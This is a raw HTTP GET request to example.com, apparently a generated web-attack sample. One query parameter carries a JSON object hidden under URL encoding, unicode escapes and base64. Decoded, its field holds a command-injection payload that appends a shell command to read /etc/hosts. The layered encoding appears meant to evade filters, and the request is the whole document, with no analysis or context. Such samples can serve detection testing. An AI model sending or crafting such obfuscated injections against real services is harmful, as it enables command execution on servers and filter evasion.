GET /link/strength?provision=render&permutation=incident&push=backslash&permissive=%09%7B%09%0D%22%5Cu0064%5Cu0065%5Cu0070%5Cu0072%5Cu0065%5Cu0063%5Cu0061%5Cu0074%5Cu0065%5Cu0064%22%0D%09%3A%0D%22%5Cu004f%5Cu0079%5Cu0042%5Cu006c%5Cu0059%5Cu0032%5Cu0068%5Cu0076%5Cu0049%5Cu0047%5Cu0041%5Cu0076%5Cu0059%5Cu006D%5Cu006C%5Cu0075%5Cu004C%5Cu0032%5Cu004E%5Cu0068%5Cu0064%5Cu0043%5Cu0041%5Cu0076%5Cu005a%5Cu0058%5Cu0052%5Cu006a%5Cu004c%5Cu0032%5Cu0068%5Cu0076%5Cu0063%5Cu0033%5Cu0052%5Cu007a%5Cu0059%5Cu0041%5Cu003d%5Cu003D%22%0D%0A%2C%0A%22%5Cu0063%5Cu006f%5Cu006e%5Cu0073%5Cu0074%5Cu0072%5Cu0061%5Cu0069%5Cu006E%5Cu0074%22%3A%0974%20%09%7D HTTP/1.1
Host: example.com
Cache-Control: no-cache
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-G920V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Cookie: model=SIT; concatenate=route; SESSIONID=1c860f7a1b75e5f5f7adc3e4a63b0a9eae3918306b0cb33c65a7121f130960082df12c11c70401309d22b954f336e203

